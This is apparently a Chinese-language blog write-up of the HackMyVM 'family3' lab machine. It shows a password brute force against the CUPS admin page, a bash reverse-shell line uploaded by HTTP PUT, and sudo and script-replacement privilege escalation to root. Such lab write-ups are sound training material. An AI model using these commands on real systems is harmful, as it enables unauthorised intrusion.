guayu-kakeru
0%

HMV-family3

发表于 分类于

HMV-family3靶场复盘

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kakeru)-[~/tmp]
└─# nmap 192.168.58.62    
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-07 17:01 CST
Nmap scan report for bogon (192.168.58.62)
Host is up (0.0069s latency).
Not shown: 998 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
631/tcp open  ipp
MAC Address: C8:21:58:16:CF:C4 (Intel Corporate)

Nmap done: 1 IP address (1 host up) scanned in 6.17 seconds

这里出现了一个我之前没怎么见过的端口631 , 搜了一下ipp是个什么服务:
互联网打印协议 (IPP),如RFC2910和RFC2911中所规定,是互联网打印的基础。其可扩展性通过IPP Everywhere等发展得以展示,旨在标准化移动和云打印,并引入3D 打印的扩展。利用HTTP协议,IPP 受益于已建立的安全实践,包括基本/摘要认证和SSL/TLS 加密。提交打印作业或查询打印机状态等操作通过指向 IPP 服务器的HTTP POST 请求进行,该服务器在port 631/tcp上运行。
IPP 的一个著名实现是CUPS,这是一个在各种 Linux 发行版和 OS X 中普遍使用的开源打印系统。尽管其有用,IPP 与 LPD 类似,可能被利用通过PostScript或PJL 文件传输恶意内容,突显出潜在的安全风险。

就是一个有漏洞的打印服务
因为这是一个基于http的服务所以还是可以去访问一下网页

web探测


这个是一个 IPP 服务器 搜了一下cups的漏洞之后发现漏洞编号是CVE-2024-47177 然后在github找到利用的脚本https://github.com/vulhub/evil-ipp-server
然后编辑一下脚本中的command,这里我选择反弹shell

然后安装ippserver库

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kakeru)-[~/tmp]
└─# pip3 install ippserver --break-system-packages
Requirement already satisfied: ippserver in /usr/local/lib/python3.12/dist-packages (0.2)
Requirement already satisfied: requests in /usr/lib/python3/dist-packages (from ippserver) (2.32.3)
Requirement already satisfied: certifi>=2017.4.17 in /usr/lib/python3/dist-packages (from requests->ippserver) (2024.12.14)
Requirement already satisfied: charset-normalizer<4,>=2 in /usr/lib/python3/dist-packages (from requests->ippserver) (3.4.0)
Requirement already satisfied: idna<4,>=2.5 in /usr/lib/python3/dist-packages (from requests->ippserver) (3.8)
Requirement already satisfied: urllib3<3,>=1.21.1 in /usr/lib/python3/dist-packages (from requests->ippserver) (2.2.3)
WARNING: Running pip as the 'root' user can result in broken permissions and conflicting behaviour with the system package manager, possibly rendering your system unusable.It is recommended to use a virtual environment instead: https://pip.pypa.io/warnings/venv. Use the --root-user-action option if you know what you are doing and want to suppress this warning.

┌──(root㉿kakeru)-[~/tmp]
└─# python3 41777.py 192.168.58.11 192.168.58.62

执行完命令之后会发现在printer这里多了一个,就是我们的攻击ip

但是试了半天,发现这个shell还是弹不回来,看了下wp,发现是走错路了
这个网站有一个admin界面,需要爆破账号密码

这里我们已经知道了一个mum的用户名,用wfuzz爆破一下
这里先用了bp拦截,发现在登录界面是一个post请求,而且参数也已知

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
┌──(root㉿kakeru)-[~/tmp]
└─# wfuzz -c -u http://192.168.58.62:631/admin/ --basic mum:FUZZ -w rockyou.txt -b 'org.cups.sid=f78970dc2347a763ec24e09c013d76bb' -d "org.cups.sid=df16eb974ff8e01177f03fafe7aa2887&OP=add-printer" -Z --hc 401
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.58.62:631/admin/
Total requests: 14344392

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                 
=====================================================================

000000001:   200        100 L    331 W      4618 Ch     "123456"                                                                                
000000003:   200        100 L    331 W      4618 Ch     "123456789"                                                                             
000000050:   200        100 L    331 W      4618 Ch     "hannah"                                                                                
000000049:   200        100 L    331 W      4618 Ch     "superman"                                                                              
000000046:   200        100 L    331 W      4618 Ch     "joshua"                                                                                
000000007:   200        100 L    331 W      4618 Ch     "1234567"                                                                               
000000015:   200        100 L    331 W      4618 Ch     "lovely"                                                                                
000000047:   200        100 L    331 W      4618 Ch     "bubbles"                                                                               
000000048:   200        100 L    331 W      4618 Ch     "1234567890"                                                                            
000000031:   200        100 L    331 W      4618 Ch     "friends"                                                                               
000000045:   200        100 L    331 W      4618 Ch     "jennifer"                                                                              
000000038:   200        100 L    331 W      4618 Ch     "loveme"                                                                                
000000041:   200        100 L    331 W      4618 Ch     "football"                                                                              
000000036:   200        100 L    331 W      4618 Ch     "liverpool"                                                                             
000000043:   200        100 L    331 W      4618 Ch     "andrea"                                                                                
000000040:   200        100 L    331 W      4618 Ch     "123123"                                                                                
000000037:   200        100 L    331 W      4618 Ch     "justin"                                                                                
000000044:   200        100 L    331 W      4618 Ch     "carlos"                                                                                
000000039:   200        100 L    331 W      4618 Ch     "fuckyou"                                                                               
000000042:   200        100 L    331 W      4618 Ch     "secret"                                                                                
000000035:   200        100 L    331 W      4618 Ch     "jordan"                                                                                
000000027:   200        100 L    331 W      4618 Ch     "chocolate"                                                                             
000000032:   200        100 L    331 W      4618 Ch     "butterfly"                                                                             
000000025:   200        100 L    331 W      4618 Ch     "tigger"                                                                                
000000033:   200        100 L    331 W      4618 Ch     "purple"                                                                                
000000029:   200        100 L    331 W      4618 Ch     "soccer"                                                                                
000000026:   200        100 L    331 W      4618 Ch     "sunshine"                                                                              
000000034:   200        100 L    331 W      4618 Ch     "angel"                                                                                 
000000028:   200        100 L    331 W      4618 Ch     "password1"                                                                             
000000030:   200        100 L    331 W      4618 Ch     "anthony"                                                                               
zsh: killed     wfuzz -c -u http://192.168.58.62:631/admin/ --basic mum:FUZZ -w rockyou.txt -

-c 带颜色输出 –basic 格式为“user:pass”或“FUZZ:FUZZ” -b 指定cookie -Z 扫描模式 -d使用post数据(例如:“id=FUZZ&catalog=1”)
但是扫出来很多个,现在把得到的结果当作一个字典,再去用bp爆破登录一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
┌──(root㉿kakeru)-[~/tmp]
└─# cat tmp | awk '{print $9}' | tr -d '"'
123456
123456789
hannah
superman
joshua
1234567
lovely
bubbles
1234567890
friends
jennifer
loveme
football
liverpool
andrea
123123
justin
carlos
fuckyou
secret
jordan
chocolate
butterfly
tigger
purple
soccer
sunshine
angel
password1
anthony
                                                                                                                                                         
┌──(root㉿kakeru)-[~/tmp]
└─# cat tmp | awk '{print $9}' | tr -d '"' > pass


在bp看到这里传入账号密码的方式是在Basic这里,并且用了base64,格式是mum:password

把刚才的字典拿进来,然后加上一个前缀以及用base64编码 最下面的url encode也要取消,因为base64里面有=号

成功找到密码lovely
登录到mum的shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(root㉿kakeru)-[~/tmp]
└─# ssh mum@192.168.58.62           
The authenticity of host '192.168.58.62 (192.168.58.62)' can't be established.
ED25519 key fingerprint is SHA256:vZEvCqRgxS6H8cJ6Umlp0yPH8QAidaOqPupC9t/CPr0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.58.62' (ED25519) to the list of known hosts.
mum@192.168.58.62's password: 
Linux family 5.10.0-18-amd64 #1 SMP Debian 5.10.140-1 (2022-09-02) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Oct 23 17:43:43 2022 from fe80::d63d:7eff:fef1:3736%enp0s3
-bash: warning: setlocale: LC_ALL: cannot change locale (en_US.UTF-8)
mum@family:~$

提权

mum

mum目录下没有任何文件,没有sudo,suid也没有
去dad的目录下面,发现有两个文件是由执行和读权限的

1
2
3
4
5
6
7
8
9
10
11
12
mum@family:/home/dad$ ls -al
total 36
drwxr-xr-x 5 dad  dad  4096 Oct 25  2022 .
drwxr-xr-x 5 root root 4096 Oct 11  2022 ..
lrwxrwxrwx 1 dad  dad     9 Oct  2  2022 .bash_history -> /dev/null
-rw-r--r-- 1 dad  dad   220 Oct  2  2022 .bash_logout
-rw-r--r-- 1 dad  dad  3526 Oct 24  2022 .bashrc
drwxr-xr-x 3 dad  dad  4096 Oct 22  2022 .local
-rw-r--r-- 1 dad  dad   807 Oct  2  2022 .profile
drwx------ 2 dad  dad  4096 Oct 23  2022 .ssh
-rwxr-xr-x 1 dad  dad   620 Oct 25  2022 project
drwxr-xr-x 2 dad  dad  4096 Oct 23  2022 survey
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
mum@family:/home/dad$ cat project 
#! /bin/bash

find / -user mum -writable -exec rm {} \; 2>/dev/null
find / -user mum -type f -name -exec grep -il 'password' {} \; 2>/dev/null
find / -user mum -type f -name "id_rsa" 2>/dev/null
find / -user mum -type f -name "authorized_keys" 2>/dev/null
find / -mmin -30 -user mum 2>/dev/null | grep -v "/proc/*"
find /home/dad -type f ! -name "project" -user dad -executable -exec mv "{}" ~/survey \; 
cat /var/mail/mum
cat /home/mum/.bash_history 2>/dev/null
cat /var/spool/cups/d0002*
for file in ~/survey/* ; do [[ -O $file ]] && bash $file 2>/dev/null ; done
strings /dev/mem -n100 | grep -i mum
who -u |grep mum

这里如果survey有文件就执行,但是现在survey有一个py文件我们看不了,看看现在的端口情况

1
2
3
4
5
6
7
8
9
10
11
12
13
mum@family:/home/dad/survey$ ss -tulnp
Netid          State           Recv-Q          Send-Q                   Local Address:Port                    Peer Address:Port         Process          
udp            UNCONN          0               0                              0.0.0.0:5353                         0.0.0.0:*                             
udp            UNCONN          0               0                              0.0.0.0:35669                        0.0.0.0:*                             
udp            UNCONN          0               0                              0.0.0.0:68                           0.0.0.0:*                             
udp            UNCONN          0               0                              0.0.0.0:631                          0.0.0.0:*                             
udp            UNCONN          0               0                                 [::]:5353                            [::]:*                             
udp            UNCONN          0               0                                 [::]:41905                           [::]:*                             
tcp            LISTEN          0               128                            0.0.0.0:22                           0.0.0.0:*                             
tcp            LISTEN          0               128                            0.0.0.0:631                          0.0.0.0:*                             
tcp            LISTEN          0               5                            127.0.0.1:8000                         0.0.0.0:*                             
tcp            LISTEN          0               128                               [::]:22                              [::]:*                             
tcp            LISTEN          0               128                               [::]:631                             [::]:*

这里发现127.0.0.1:8000 这里发现8000端口开着,用socat来实现端口转发

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
mum@family:~$ wget 192.168.58.11/socat
--2025-03-07 11:42:39--  http://192.168.58.11/socat
Connecting to 192.168.58.11:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 375176 (366K) [application/octet-stream]
Saving to: 'socat'

socat                                  100%[=========================================================================>] 366.38K  1.63MB/s    in 0.2s    

2025-03-07 11:42:40 (1.63 MB/s) - 'socat' saved [375176/375176]

mum@family:~$ chmod +x socat
mum@family:~$ ./socat TCP-LISTEN:8080,fork 127.0.0.1:8000  
^Cmum@family:~$ ./socat TCP-LISTEN:8080,fork 127.0.0.1:8000  ^C
mum@family:~$ ./socat TCP-LISTEN:8080,fork 127.0.0.1:8000  &
[1] 34365

把127.0.0.1:8000 转发到8080端口 用&在后台进行
现在去访问8080端口就有东西了,这里是显示返回为空

1
2
3
┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.58.62:8080
curl: (52) Empty reply from server

这里有一个比较难想的点就是怎么把文件写入到这个survey目录下面,因为这里的project会执行所有survey下面的文件
这里是用了一个nikto扫描了一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(root㉿kakeru)-[~/tmp]
└─# nikto -h 192.168.58.39:8080
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.58.39
+ Target Hostname:    192.168.58.39
+ Target Port:        8080
+ Start Time:         2025-03-07 19:20:02 (GMT8)
---------------------------------------------------------------------------
+ Server: SimpleHTTP/0.6 Python/2.7.18
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Python/2.7.18 appears to be outdated (current is at least 3.9.6).
+ SimpleHTTP/0.6 appears to be outdated (current is at least 1.2).

mum@family:/home/dad/survey$ ls
index.html  nikto-test-LsluKoIs.html  server.py

结果发现在survey下面多了一个 nikto-test-LsluKoIs.html,因为在nikto扫描的时候会尝试上传文件,说明这个页面是可以上传文件
所以用PUT请求方式上传一个反弹shell的sh文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(root㉿kakeru)-[~/tmp]
└─# curl -X PUT 192.168.58.39:8080/reverse -d "bash -i >& /dev/tcp/192.168.58.11/1234 0>&1"                                               
curl: (52) Empty reply from server

 mum@family:/home/dad$ ./project 

┌──(root㉿kakeru)-[~/tmp]
└─# nc -lp 1234                
id
id
bash: cannot set terminal process group (5833): Inappropriate ioctl for device
bash: no job control in this shell
dad@family:~$ id
uid=1000(dad) gid=1000(dad) groups=1000(dad),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(bluetooth)
dad@family:~$ id
uid=1000(dad) gid=1000(dad) groups=1000(dad),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(bluetooth)
dad@family:~$

dad

1
2
3
4
5
6
dad@family:~$ sudo -l
Matching Defaults entries for dad on family:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User dad may run the following commands on family:
    (baby) NOPASSWD: /usr/bin/julia

在gtfobins里面找到提权方式 sudo julia -e 'run(/bin/sh)'
得到baby的shell

baby

1
2
3
4
5
6
b👶by@family:~$ sudo -l
Matching Defaults entries for baby on family:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User baby may run the following commands on family:
    (root) NOPASSWD: /home/baby/chocapic

baby在自己目录下面有一个sudo权限的文件.因为这个是在自己家目录里面的文件,所以可以直接删除再创建

1
2
3
4
5
6
7
8
9
b👶by@family:~$ rm chocapic
rm: remove write-protected regular file 'chocapic'? y
b👶by@family:~$ ls
user.txt
b👶by@family:~$ echo "/bin/bash -p" > chocapic
b👶by@family:~$ chmod +x chocapic 
b👶by@family:~$ sudo /home/baby/chocapic
bash: warning: setlocale: LC_ALL: cannot change locale (en_US.UTF-8)
root@family:/home/baby#

拿到了root

root

这题拿到了root权限还不行,不能直接看flag

1
2
3
4
5
6
7
root@family:/home/baby# cd 
root@family:~# ls
root.txt
root@family:~# cat root.txt 
Salted__"?1լ???Ȉ?m?:Pi?|q?8FH?yNU:k?.ᛥ?24?}??;E?$/7root@family:~# 
root@family:~# file root.txt 
root.txt: openssl enc'd data with salted password

这是一个openssl加密过的密码
这里说明还有别的信息,我新学了原来还可以看磁盘空间,这题就是有别的磁盘 用fdisk -l

1
2
3
4
5
6
7
8
9
10
11
12
13
14
root@family:~# fdisk -l
Disk /dev/sda: 15.26 GiB, 16385299968 bytes, 32002539 sectors
Disk model: VBOX HARDDISK   
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0xb6ff27bb

Device     Boot    Start      End  Sectors  Size Id Type
/dev/sda1  *        2048 27897855 27895808 13.3G 83 Linux
/dev/sda2       27899902 29898751  1998850  976M  5 Extended
/dev/sda3       29898752 32002047  2103296    1G 83 Linux
/dev/sda5       27899904 29898751  1998848  976M 82 Linux swap / Solaris

发现还有一个/dev/sda3 

1
2
3
4
5
6
root@family:~# mount /dev/sda3 /mnt
root@family:~# cd /mnt
root@family:/mnt# ls
password
root@family:/mnt# cat password 
QHSvtnwvnUgKRGDQfG6rC58bAU4woNIW0Z7eL6ma

把sda3挂载到/mnt之后,找到一个密码,但是这个密码不是root的密码 这个应该就是openssl的密码

1
2
3
4
5
root@family:~# openssl enc -d -aes-256-cbc -in root.txt -k QHSvtnwvnUgKRGDQfG6rC58bAU4woNIW0Z7eL6ma
*** WARNING : deprecated key derivation used.
Using -iter or -pbkdf2 would be better.
bad decrypt
139669560771904:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:../crypto/evp/evp_enc.c:610:

直接尝试之后说要用-pbkdf2

1
2
3
4
5
6
root@family:~# openssl enc -d -aes-256-cbc -in root.txt -k QHSvtnwvnUgKRGDQfG6rC58bAU4woNIW0Z7eL6ma -pbkdf2
G??Ʋ.?
      ??`?͙???"?"
bad decrypt
139681936713024:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:../crypto/evp/evp_enc.c:610:
-c???=root@family:~#

还是不行,最后切换密钥分组长度从256修改成128可以了

1
2
root@family:~# openssl enc -d -aes-128-cbc -in root.txt -k QHSvtnwvnUgKRGDQfG6rC58bAU4woNIW0Z7eL6ma -pbkdf2
8d8ff4976efccbfc8ff7d7554b9239e5

总结

  • 这个靶机让我学到了一个新服务ipp 而且这个服务有漏洞
  • 学习到用wfuzz的扫描方式
  • 这个用户什么东西有没有的时候去其他用户里面看看有什么可以执行的文件
  • 自己家目录下面的文件要是有sudo权限就直接删除再创一个提权
  • 学习到df -h 和 fdisk -l 命令,两个关于磁盘的命令, 可能有信息在不同的磁盘
  • 最后了解了openssl的加解密方式